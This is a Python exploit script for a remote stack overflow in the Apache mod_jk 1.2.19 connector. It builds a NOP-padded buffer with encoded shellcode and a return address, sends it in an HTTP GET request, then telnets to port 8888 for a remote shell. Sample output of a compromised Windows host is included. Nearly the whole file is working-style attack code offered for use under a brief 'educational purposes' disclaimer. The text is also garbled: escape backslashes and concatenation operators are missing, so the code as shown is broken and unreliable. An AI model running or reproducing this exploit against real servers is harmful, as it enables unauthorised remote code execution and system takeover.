#!/usr/bin/python

#

# _____ _ _ _____ _____ _____ _____

# / ___| |_| | _ | _ | _ |_ _|

# | (___| _ | [_)_/| (_) | (_) | | |

# _____|_| |_|_| |_||_____|_____| |_|

# C. H. R. O. O. T. SECURITY GROUP

# - -- ----- --- -- -- ---- --- -- -

#

#

# _ _ _ _____ ____ ____ __ _

# Hacks In Taiwan | |_| | |_ _| __| | | |

# Conference 2008 | _ | | | | | (__| () | |

# |_| |_|_| |_| ____|____|_|__|

#

#

#

# Title =======:: Apache (mod_jk) 1.2.19 Remote Stack Overflow Exploit

#

# Author ======:: unohope [at] chroot [dot] org

#

# IRC =========:: #chroot

#

# ScriptName ==:: Apache Module mod_jk/1.2.19

#

# Vendor ======:: /

#

# Download ====:: /dist/tomcat/tomcat-connectors/jk/binaries/win32/

#

# Tested on ===:: Apache/2.0.58 (Win32) mod_jk/1.2.19

# Apache/2.0.59 (Win32) mod_jk/1.2.19

#

# Greets ======:: zha0

#

#

# [root@wargame tmp]# ./apx-jk_mod-1.2.19

# Apache (mod_jk) 1.2.19 Remote Stack Overflow Exploit (unohope@)

#

# usage: ./apx-jk_mod-1.2.19

#

# [root@wargame tmp]# ./apx-jk_mod-1.2.19 192.168.1.78

# Apache (mod_jk) 1.2.19 Remote Stack Overflow Exploit (unohope@)

#

# [ ] connecting to 192.168.1.78 ...

#

# Trying 192.168.1.78...

# Connected to 192.168.1.78.

# Escape character is '^]'.

# Microsoft Windows XP [.. 5.1.2600]

# (C) Copyright 1985-2001 Microsoft Corp.

#

# C:AppServApache2

#

#

import os, sys, time

from socket import *

shellcode = "xebx03x59xebx05xe8xf8xffxffxffx49x49x49x49x49x49"

shellcode = "x49x49x49x49x49x49x49x49x49x37x49x49x51x5ax6ax68"

shellcode = "x58x30x41x31x50x42x41x6bx42x41x78x42x32x42x41x32"

shellcode = "x41x41x30x41x41x58x38x42x42x50x75x4bx59x49x6cx43"

shellcode = "x5ax7ax4bx32x6dx5ax48x5ax59x69x6fx4bx4fx39x6fx71"

shellcode = "x70x6ex6bx62x4cx44x64x71x34x4cx4bx62x65x75x6cx4c"

shellcode = "x4bx63x4cx76x65x70x78x35x51x48x6fx6cx4bx50x4fx74"

shellcode = "x58x6ex6bx33x6fx55x70x37x71x48x6bx57x39x6cx4bx66"

shellcode = "x54x6ex6bx46x61x7ax4ex47x41x6bx70x7ax39x4cx6cx4c"

shellcode = "x44x6fx30x62x54x44x47x38x41x4bx7ax54x4dx44x41x4b"

shellcode = "x72x78x6bx39x64x35x6bx53x64x75x74x46x48x72x55x79"

shellcode = "x75x6cx4bx53x6fx76x44x44x41x48x6bx35x36x4ex6bx54"

shellcode = "x4cx30x4bx6cx4bx51x4fx65x4cx65x51x38x6bx77x73x36"

shellcode = "x4cx4ex6bx6ex69x30x6cx66x44x45x4cx30x61x69x53x30"

shellcode = "x31x79x4bx43x54x6cx4bx63x73x44x70x4ex6bx77x30x66"

shellcode = "x6cx6cx4bx72x50x45x4cx4cx6dx4ex6bx73x70x64x48x73"

shellcode = "x6ex55x38x6ex6ex32x6ex34x4ex58x6cx62x70x39x6fx6b"

shellcode = "x66x70x66x61x43x52x46x71x78x30x33x55x62x63x58x63"

shellcode = "x47x34x33x65x62x41x4fx30x54x39x6fx4ax70x52x48x5a"

shellcode = "x6bx38x6dx6bx4cx75x6bx30x50x6bx4fx6ex36x53x6fx6f"

shellcode = "x79x4ax45x32x46x6fx71x6ax4dx34x48x77x72x73x65x73"

shellcode = "x5ax37x72x69x6fx58x50x52x48x4ex39x76x69x4ax55x4c"

shellcode = "x6dx32x77x69x6fx59x46x50x53x43x63x41x43x70x53x70"

shellcode = "x53x43x73x50x53x62x63x70x53x79x6fx6ax70x35x36x61"

shellcode = "x78x71x32x78x38x71x76x30x53x4bx39x69x71x4dx45x33"

shellcode = "x58x6cx64x47x6ax74x30x5ax67x43x67x79x6fx39x46x32"

shellcode = "x4ax56x70x66x31x76x35x59x6fx58x50x32x48x4dx74x4e"

shellcode = "x4dx66x4ex7ax49x50x57x6bx4fx6ex36x46x33x56x35x39"

shellcode = "x6fx78x50x33x58x6bx55x51x59x4ex66x50x49x51x47x39"

shellcode = "x6fx48x56x32x70x32x74x62x74x46x35x4bx4fx38x50x6e"

shellcode = "x73x55x38x4dx37x71x69x69x56x71x69x61x47x6bx4fx6e"

shellcode = "x36x36x35x79x6fx6ax70x55x36x31x7ax71x74x32x46x51"

shellcode = "x78x52x43x70x6dx4fx79x4dx35x72x4ax66x30x42x79x64"

shellcode = "x69x7ax6cx4bx39x48x67x62x4ax57x34x4fx79x6dx32x37"

shellcode = "x41x6bx70x7ax53x6ex4ax69x6ex32x62x46x4dx6bx4ex70"

shellcode = "x42x44x6cx4cx53x6ex6dx31x6ax64x78x4cx6bx4ex4bx4e"

shellcode = "x4bx43x58x70x72x69x6ex6dx63x37x66x79x6fx63x45x73"

shellcode = "x74x4bx4fx7ax76x63x6bx31x47x72x72x41x41x50x51x61"

shellcode = "x41x70x6ax63x31x41x41x46x31x71x45x51x41x4bx4fx78"

shellcode = "x50x52x48x4cx6dx79x49x54x45x38x4ex53x63x6bx4fx6e"

shellcode = "x36x30x6ax49x6fx6bx4fx70x37x4bx4fx4ex30x4ex6bx30"

shellcode = "x57x69x6cx6bx33x4bx74x62x44x79x6fx6bx66x66x32x6b"

shellcode = "x4fx4ex30x53x58x58x70x4ex6ax55x54x41x4fx52x73x4b"

shellcode = "x4fx69x46x4bx4fx6ex30x68";

foo_base = 8

buf_base = 4087

buf_offset = foo_base * 11

nop = "x90"

ret = "xccx2axd9x77"

buf = nop*foo_base shellcode nop*(buf_base - foo_base - len(shellcode) - buf_offset) ret

buf = "x90x90xb0x53x6bxC0x28x03xd8xffxd3" nop*(buf_offset - foo_base - 3)

def usage():

print 'usage: %s n' % sys.argv[0]

sys.exit(-1)

def xpl():

try:

print len(buf)

sockaddr = (host, 80)

s = socket(AF_INET, SOCK_STREAM)

s.connect(sockaddr)

payload = buf 'HTTP/1.0rnHost: %srnrn�' % host

s.send('GET /' payload)

s.close()

print ' [ ] connecting to %s ...n' % host

time.sleep(3)

os.system("telnet %s 8888" % host)

except:

print ' [-] EXPLOIT FAILED!n'

if __name__ == '__main__':

print 'Apache (mod_jk) 1.2.19 Remote Stack Overflow Exploit (unohope [at] )n'

try:

host = sys.argv[1]

except IndexError:

usage()

xpl()

# [NOTE]

#

# !! This is just for educational purposes, DO NOT use for illegal. !!

#